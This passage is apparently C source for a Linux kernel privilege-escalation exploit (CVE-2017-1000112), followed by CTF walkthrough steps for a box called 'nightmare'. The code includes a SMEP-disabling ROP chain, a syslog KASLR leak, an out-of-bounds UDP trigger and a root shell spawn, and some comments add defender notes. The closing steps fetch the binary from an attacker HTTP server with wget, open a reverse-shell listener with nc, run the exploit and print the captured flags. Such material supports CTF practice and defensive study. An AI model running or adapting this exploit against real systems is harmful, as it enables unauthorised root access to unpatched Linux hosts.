- *stack++ = OR_RAX_RCX_RET; \
- *stack++ = NEG_RAX_RET; \
- *stack++ = XCHG_EAX_EDI_RET; \
- *stack++ = MOV_CR4_RDI_RET;
- #define CHAIN_JMP_PAYLOAD \
- *stack++ = POP_RCX_RET; \
- *stack++ = (uint64_t)&payload; \
- *stack++ = JMP_RCX;
- // Maps eight pages read/write with MAP_FIXED, starting four pages below the
- // page that holds the low 32 bits of XCHG_EAX_ESP_RET, then writes the three
- // CHAIN_* macro sequences starting at stack_aligned + stack_offset. Exits if
- // mmap fails or returns a different address than requested.
- // NOTE(review): this places the chain in user-space memory; check_smep_smap()
- // in this file exits when SMAP is reported, stating no bypass is available.
- void mmap_stack() {
- uint64_t stack_aligned, stack_addr;
- int page_size, stack_size, stack_offset;
- uint64_t* stack;
- page_size = getpagesize();
- // Keep only the low 32 bits of the gadget address, rounded down to a page boundary.
- stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
- stack_addr = stack_aligned - page_size * 4;
- stack_size = page_size * 8;
- stack_offset = XCHG_EAX_ESP_RET % page_size;
- stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
- MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
- if (stack == MAP_FAILED || stack != (void*)stack_addr) {
- perror("[-] mmap()");
- exit(EXIT_FAILURE);
- }
- stack = (uint64_t*)((char*)stack_aligned + stack_offset);
- // Each macro appends 64-bit entries through `*stack++`.
- CHAIN_SAVE_ESP;
- CHAIN_DISABLE_SMEP;
- CHAIN_JMP_PAYLOAD;
- }
- // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
#define SYSLOG_ACTION_READ_ALL 3
#define SYSLOG_ACTION_SIZE_BUFFER 10

/*
 * Read the kernel log into a newly mapped anonymous buffer.
 *
 * On return *buffer points at the mapping and *size holds the byte count
 * reported by klogctl(SYSLOG_ACTION_READ_ALL). Either klogctl call failing
 * prints a message and exits.
 * NOTE(review): the mmap() result is passed on without a MAP_FAILED check.
 * NOTE(review): this needs an unprivileged process to be allowed to read the
 * kernel log; the kernel.dmesg_restrict sysctl is the usual control for that.
 */
void mmap_syslog(char** buffer, int* size) {
    int log_len = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
    *size = log_len;
    if (log_len == -1) {
        perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
        exit(EXIT_FAILURE);
    }

    /* Round up to the next whole page (always adds at least one byte). */
    int page = getpagesize();
    int rounded = (log_len / page + 1) * page;
    *size = rounded;

    char *map = (char*)mmap(NULL, rounded, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    *buffer = map;

    int got = klogctl(SYSLOG_ACTION_READ_ALL, &map[0], rounded);
    *size = got;
    if (got == -1) {
        perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
        exit(EXIT_FAILURE);
    }
}
/*
 * Extract an address from a kernel-log buffer (trusty layout).
 *
 * Finds the first "Freeing unused" occurrence, looks for "ffffff" between
 * that point and the next '-', parses the hex number starting there and
 * returns it with the low 24 bits cleared. Exits if either substring is
 * missing.
 * NOTE(review): the scan for '-' is not bounded by `size`.
 */
unsigned long get_kernel_addr_trusty(char* buffer, int size) {
    const char* marker = "Freeing unused";
    char* line = (char*)memmem(buffer, size, marker, strlen(marker));
    if (line == NULL) {
        fprintf(stderr, "[-] substring '%s' not found in syslog\n", marker);
        exit(EXIT_FAILURE);
    }

    /* Index of the first '-' after the marker. */
    int dash = 0;
    while (line[dash] != '-')
        dash++;

    const char* hex_prefix = "ffffff";
    char* addr = (char*)memmem(line, dash, hex_prefix, strlen(hex_prefix));
    if (addr == NULL) {
        fprintf(stderr, "[-] substring '%s' not found in syslog\n", hex_prefix);
        exit(EXIT_FAILURE);
    }

    char* stop = addr + 16;
    unsigned long value = strtoul(addr, &stop, 16);
    return value & 0xffffffffff000000ul;
}
/*
 * Extract an address from a kernel-log buffer (xenial layout).
 *
 * Finds the first "Freeing unused" occurrence, looks for "ffffff" between
 * the next '-' and the end of that line, parses the hex number starting
 * there, clears its low 20 bits and subtracts 0x1000000. Exits if either
 * substring is missing.
 * NOTE(review): the scans for '-' and '\n' are not bounded by `size`.
 */
unsigned long get_kernel_addr_xenial(char* buffer, int size) {
    const char* marker = "Freeing unused";
    char* line = (char*)memmem(buffer, size, marker, strlen(marker));
    if (line == NULL) {
        fprintf(stderr, "[-] substring '%s' not found in syslog\n", marker);
        exit(EXIT_FAILURE);
    }

    /* Index of the first '-' after the marker, then of the line end. */
    int dash = 0;
    while (line[dash] != '-')
        dash++;
    int eol = dash;
    while (line[eol] != '\n')
        eol++;

    const char* hex_prefix = "ffffff";
    char* addr = (char*)memmem(line + dash, eol - dash, hex_prefix, strlen(hex_prefix));
    if (addr == NULL) {
        fprintf(stderr, "[-] substring '%s' not found in syslog\n", hex_prefix);
        exit(EXIT_FAILURE);
    }

    char* stop = addr + 16;
    unsigned long value = strtoul(addr, &stop, 16);
    value &= 0xfffffffffff00000ul;
    return value - 0x1000000ul;
}
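/*
 * Return the address recovered from the kernel log.
 *
 * The log is fetched with mmap_syslog() and always parsed with
 * get_kernel_addr_xenial(): the per-distro choice between the trusty and
 * xenial parsers is disabled in this copy of the file, so the kernels[] row
 * is not consulted here. The statements that used to follow the
 * unconditional return were unreachable and are not kept.
 */
unsigned long get_kernel_addr() {
    char* syslog;
    int size;

    mmap_syslog(&syslog, &size);
    return get_kernel_addr_xenial(syslog, size);
}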
- // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
- // User-space stand-ins for two kernel structures; each field comment names
- // the kernel-side type the field stands for.
- // NOTE(review): the layouts presumably have to match the target kernel build — confirm.
- struct ubuf_info {
- uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
- uint64_t ctx; // void *
- uint64_t desc; // unsigned long
- };
- struct skb_shared_info {
- uint8_t nr_frags; // unsigned char
- uint8_t tx_flags; // __u8
- uint16_t gso_size; // unsigned short
- uint16_t gso_segs; // unsigned short
- uint16_t gso_type; // unsigned short
- uint64_t frag_list; // struct sk_buff *
- uint64_t hwtstamps; // struct skb_shared_hwtstamps
- uint32_t tskey; // u32
- uint32_t ip6_frag_id; // __be32
- uint32_t dataref; // atomic_t
- uint64_t destructor_arg; // void *
- uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
- };
- // File-scope instance that init_skb_buffer() fills in and points destructor_arg at.
- struct ubuf_info ui;
- // Treats `buffer` as a struct skb_shared_info: zeroes it, sets tx_flags to
- // 0xff, points destructor_arg at the global `ui`, and stores `func` in
- // ui.callback. `buffer` must have room for sizeof(struct skb_shared_info).
- void init_skb_buffer(char* buffer, unsigned long func) {
- struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
- memset(ssi, 0, sizeof(*ssi));
- ssi->tx_flags = 0xff;
- ssi->destructor_arg = (uint64_t)&ui;
- ssi->nr_frags = 0;
- ssi->frag_list = 0;
- ui.callback = func;
- }
- // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
- #define SHINFO_OFFSET 3164
- // Trigger routine of this PoC (the file header names CVE-2017-1000112).
- // Visible sequence: fill a 4096-byte buffer with 0x42, lay out the structure
- // from init_skb_buffer() at SHINFO_OFFSET with `payload` as the callback
- // value, connect a UDP socket to 127.0.0.1:8000, send SHINFO_OFFSET +
- // sizeof(struct skb_shared_info) bytes with MSG_MORE, set SO_NO_CHECK, then
- // send one more byte and close the socket. Any failing call except the last
- // send prints a message and exits.
- void oob_execute(unsigned long payload) {
- char buffer[4096];
- memset(&buffer[0], 0x42, 4096);
- init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
- int s = socket(PF_INET, SOCK_DGRAM, 0);
- if (s == -1) {
- perror("[-] socket()");
- exit(EXIT_FAILURE);
- }
- struct sockaddr_in addr;
- memset(&addr, 0, sizeof(addr));
- addr.sin_family = AF_INET;
- addr.sin_port = htons(8000);
- addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
- if (connect(s, (void*)&addr, sizeof(addr))) {
- perror("[-] connect()");
- exit(EXIT_FAILURE);
- }
- int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
- int rv = send(s, buffer, size, MSG_MORE);
- if (rv != size) {
- perror("[-] send()");
- exit(EXIT_FAILURE);
- }
- int val = 1;
- rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
- if (rv != 0) {
- perror("[-] setsockopt(SO_NO_CHECK)");
- exit(EXIT_FAILURE);
- }
- // The return value of this final send is not checked.
- send(s, buffer, 1, 0);
- close(s);
- }
- // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
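#define CHUNK_SIZE 1024

/*
 * Read up to `max_length` bytes of `file` into `buffer`, CHUNK_SIZE bytes at
 * a time.
 *
 * Returns the number of bytes read, or -1 if the file cannot be opened or a
 * read fails (errno is left as set by the failing call, so callers can use
 * perror). The buffer is not NUL-terminated. The descriptor is closed on
 * every path.
 */
int read_file(const char* file, char* buffer, int max_length) {
    int f = open(file, O_RDONLY);
    if (f == -1)
        return -1;

    int bytes_read = 0;
    while (true) {
        int bytes_to_read = CHUNK_SIZE;
        if (bytes_to_read > max_length - bytes_read)
            bytes_to_read = max_length - bytes_read;
        /* Buffer full (or a non-positive max_length): stop without passing
         * a zero or negative count to read(). */
        if (bytes_to_read <= 0)
            break;

        int rv = read(f, &buffer[bytes_read], bytes_to_read);
        if (rv == -1) {
            /* close() may overwrite errno; keep the read error for the caller. */
            int saved_errno = errno;
            close(f);
            errno = saved_errno;
            return -1;
        }
        if (rv == 0)
            break;
        bytes_read += rv;
    }

    close(f);
    return bytes_read;
}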
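#define LSB_RELEASE_LENGTH 1024

/*
 * Copy the DISTRIB_CODENAME value from /etc/lsb-release into `output` as a
 * NUL-terminated string.
 *
 * `max_length` is the size of `output` including the terminator. Exits if
 * the file cannot be read or the key is missing; asserts if the value does
 * not fit or is not terminated by a newline within the bytes read.
 */
void get_distro_codename(char* output, int max_length) {
    char buffer[LSB_RELEASE_LENGTH];
    int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);
    if (length == -1) {
        perror("[-] open/read(/etc/lsb-release)");
        exit(EXIT_FAILURE);
    }

    const char *needle = "DISTRIB_CODENAME=";
    int needle_length = strlen(needle);
    char* found = memmem(&buffer[0], length, needle, needle_length);
    if (found == NULL) {
        printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
        exit(EXIT_FAILURE);
    }

    assert(max_length > 0);
    const char *value = found + needle_length;
    int i;
    for (i = 0; ; i++) {
        /* Check the index against the bytes actually read before looking
         * at the character, so the scan never leaves the file contents. */
        assert((value - &buffer[0]) + i < length);
        if (value[i] == '\n')
            break;
        /* Leave room for the terminator. */
        assert(i < max_length - 1);
        output[i] = value[i];
    }
    /* Terminate so the result can be used with the str* functions. */
    output[i] = '\0';
}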
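/*
 * Copy the running kernel's release string (uname's `release` field) into
 * `output` as a NUL-terminated string.
 *
 * `max_length` is the size of `output` including the terminator. Exits if
 * uname() fails; asserts if the string does not fit.
 */
void get_kernel_version(char* output, int max_length) {
    struct utsname u;
    int rv = uname(&u);
    if (rv != 0) {
        perror("[-] uname())");
        exit(EXIT_FAILURE);
    }
    /* Strictly less than: strcpy also writes the terminating NUL, so a
     * release string of exactly max_length characters would overflow. */
    assert(max_length > 0 && strlen(u.release) < (size_t)max_length);
    strcpy(&output[0], u.release);
}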
#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
#define DISTRO_CODENAME_LENGTH 32
#define KERNEL_VERSION_LENGTH 32

/*
 * Check that the running kernel release appears in the kernels[] table.
 *
 * Prints the matching release and returns, or prints an error and exits when
 * no row matches. Only the release string is compared; the distro codename
 * is fetched but not used in the comparison, and the index of the matching
 * row is not stored, so the global `kernel` keeps whatever value it had.
 */
void detect_versions() {
    char distro[DISTRO_CODENAME_LENGTH];
    char release[KERNEL_VERSION_LENGTH];

    get_distro_codename(distro, DISTRO_CODENAME_LENGTH);
    get_kernel_version(release, KERNEL_VERSION_LENGTH);

    for (int idx = 0; idx < ARRAY_SIZE(kernels); idx++) {
        if (strcmp(release, kernels[idx].version) != 0)
            continue;
        printf("[.] kernel version '%s' detected\n", kernels[idx].version);
        return;
    }

    printf("[-] kernel version not recognized\n");
    exit(EXIT_FAILURE);
}
#define PROC_CPUINFO_LENGTH 4096

/*
 * Report whether the strings "smep" and "smap" occur in the data read from
 * /proc/cpuinfo (the read is capped at PROC_CPUINFO_LENGTH bytes).
 *
 * Returns: 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP.
 * Exits the process if the file cannot be read.
 *
 * NOTE(review): this is a plain substring search over the capped buffer, so
 * it reflects what the cpuinfo text contains, not necessarily what the
 * running kernel enforces; confirm before relying on it as a hardening check.
 */
int smap_smep_enabled() {
    char cpuinfo[PROC_CPUINFO_LENGTH];
    int n = read_file("/proc/cpuinfo", cpuinfo, PROC_CPUINFO_LENGTH);
    if (n == -1) {
        perror("[-] open/read(/proc/cpuinfo)");
        exit(EXIT_FAILURE);
    }

    int has_smep = memmem(cpuinfo, n, "smep", 4) != NULL;
    int has_smap = memmem(cpuinfo, n, "smap", 4) != NULL;

    /* Bit 0 encodes SMEP, bit 1 encodes SMAP. */
    return has_smep + 2 * has_smap;
}
/*
 * Stop the program when smap_smep_enabled() reports a protection this build
 * does not handle: SMAP always, and SMEP unless ENABLE_SMEP_BYPASS was set
 * at compile time. Returns normally otherwise.
 */
void check_smep_smap() {
    int protections = smap_smep_enabled();
    const char *fatal = NULL;

    if (protections >= 2)
        fatal = "[-] SMAP detected, no bypass available\n";
#if !ENABLE_SMEP_BYPASS
    else if (protections >= 1)
        fatal = "[-] SMEP detected, use ENABLE_SMEP_BYPASS\n";
#endif

    if (fatal != NULL) {
        printf("%s", fatal);
        exit(EXIT_FAILURE);
    }
}
- // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
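/*
 * Format a string printf-style and write it to an existing file in a single
 * write() call.
 *
 * file  path to open write-only (the file is not created)
 * what  printf-style format string, followed by its arguments
 *
 * Returns true only if the whole formatted string was written. Returns
 * false if formatting fails, the result does not fit in the 1024-byte
 * buffer, the file cannot be opened, or the write is short or fails.
 */
static bool write_file(const char* file, const char* what, ...) {
    char buf[1024];
    va_list args;
    va_start(args, what);
    int len = vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);

    /* vsnprintf returns the length the full output would have had. Refuse to
     * write a silently truncated string: the callers write id mappings, and
     * a partial line there would not be what they asked for. */
    if (len < 0 || (size_t)len >= sizeof(buf))
        return false;

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    bool ok = (write(fd, buf, len) == len);
    close(fd);
    return ok;
}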
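/*
 * Move the process into new user and network namespaces, map uid/gid 0
 * inside the namespace to the caller's real uid/gid, pin the process to
 * CPU 0 and configure the loopback interface. Exits the process on the
 * first step that fails.
 *
 * Defender note: the first step depends on unprivileged user namespaces
 * being available. Where they are disabled (for example
 * user.max_user_namespaces=0, or kernel.unprivileged_userns_clone=0 on
 * Debian/Ubuntu kernels) unshare(CLONE_NEWUSER) fails and the program stops
 * here. unshare() with CLONE_NEWUSER from an unexpected process is also a
 * useful audit signal.
 */
void setup_sandbox() {
    /* Read the ids before unshare(); they are needed for the id maps. */
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        printf("[!] unprivileged user namespaces are not available\n");
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
    if (unshare(CLONE_NEWNET) != 0) {
        /* Label fixed: this call is CLONE_NEWNET, not CLONE_NEWUSER. */
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    /* setgroups is written before gid_map, in the order the code relies on. */
    if (!write_file("/proc/self/setgroups", "deny")) {
        /* Label fixed to match the path that is actually written. */
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

    /* Restrict the calling process (pid 0 = self) to CPU 0. */
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
        perror("[-] sched_setaffinity()");
        exit(EXIT_FAILURE);
    }

    /* NOTE(review): system() reports the command's exit status; errno may
     * not describe the failure, so the perror() text below can mislead. */
    if (system("/sbin/ifconfig lo mtu 1500") != 0) {
        perror("[-] system(/sbin/ifconfig lo mtu 1500)");
        exit(EXIT_FAILURE);
    }
    if (system("/sbin/ifconfig lo up") != 0) {
        perror("[-] system(/sbin/ifconfig lo up)");
        exit(EXIT_FAILURE);
    }
}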
/*
 * Replace the current process image with an interactive /bin/bash, passing
 * a NULL environment pointer. The execve() result is not checked, so the
 * function simply returns if the call fails.
 */
void exec_shell() {
    char* shell_argv[] = {"/bin/bash", "-i", NULL};
    execve(shell_argv[0], shell_argv, NULL);
}
/*
 * Report whether /etc/shadow can be opened for reading.
 *
 * The uid cannot simply be checked, because the process runs inside a
 * namespace where its uid is already 0; being able to open /etc/shadow is
 * used as the test instead.
 */
bool is_root() {
    int shadow_fd = open("/etc/shadow", O_RDONLY);
    bool readable = (shadow_fd != -1);
    if (readable)
        close(shadow_fd);
    return readable;
}
/*
 * Log the result of is_root(). On success, hand the process over to
 * exec_shell(); on failure, print a message and return.
 */
void check_root() {
    printf("[.] checking if we got root\n");
    if (is_root()) {
        printf("[+] got r00t ^_^\n");
        exec_shell();
        return;
    }
    printf("[-] something went wrong =(\n");
}
/*
 * Program entry point: runs the pre-flight check, the namespace setup, the
 * optional compile-time stages, and finally the payload and the root check.
 * argc/argv are not used. Helpers called here exit the process themselves on
 * failure, so reaching a later line means the earlier stage returned.
 */
int main(int argc, char** argv) {
    fputs("[.] starting\n", stdout);

    /*
     * Version detection is disabled in this copy:
     *   printf("[.] checking distro and kernel versions\n");
     *   detect_versions();
     * The "versions looks good" line below is therefore printed without any
     * check having run.
     */
    fputs("[~] done, versions looks good\n", stdout);

    fputs("[.] checking SMEP and SMAP\n", stdout);
    check_smep_smap();
    fputs("[~] done, looks good\n", stdout);

    fputs("[.] setting up namespace sandbox\n", stdout);
    setup_sandbox();
    fputs("[~] done, namespace sandbox set up\n", stdout);

#if ENABLE_KASLR_BYPASS
    fputs("[.] KASLR bypass enabled, getting kernel addr\n", stdout);
    KERNEL_BASE = get_kernel_addr();
    printf("[~] done, kernel text: %lx\n", KERNEL_BASE);
#endif

    /* COMMIT_CREDS and PREPARE_KERNEL_CRED are defined elsewhere in the file. */
    printf("[.] commit_creds: %lx\n", COMMIT_CREDS);
    printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);

    unsigned long payload = (unsigned long)&get_root;

#if ENABLE_SMEP_BYPASS
    fputs("[.] SMEP bypass enabled, mmapping fake stack\n", stdout);
    mmap_stack();
    payload = XCHG_EAX_ESP_RET;
    fputs("[~] done, fake stack mmapped\n", stdout);
#endif

    printf("[.] executing payload %lx\n", payload);
    oob_execute(payload);
    fputs("[~] done, should be root now\n", stdout);

    check_root();

    return 0;
}
- gcc poc.c -o poc
- next, transfer the binary to the server; the transfer has to go over port 80 or 443
- on server goto on /home/decoder/test/
- on your system python -m SimpleHTTPServer 80
- on server
- wget http://10.10.??.??:80/poc
- after that, set its permissions: chmod 777 poc
- then stop the Python server and log in to the server again
- because we can't root with decoder user group we only need ftpuser
- because only decoder can write on test folder not ftpuser because of that we need to change
- ./shell
- nc -lvnp 80
- now u got shell
- cd /home/decoder/test/
- ./poc
- u got root
- root@nightmare:/root# cat root.txt
- cat root.txt
- a1604f74e9d1c201f7ddf3bf5b356f89
- root@nightmare:/root# cat /home/decoder/user.txt
- cat /home/decoder/user.txt
- d75ce743ecd84db14c759ee23d2cb1a5
- root@nightmare:/root#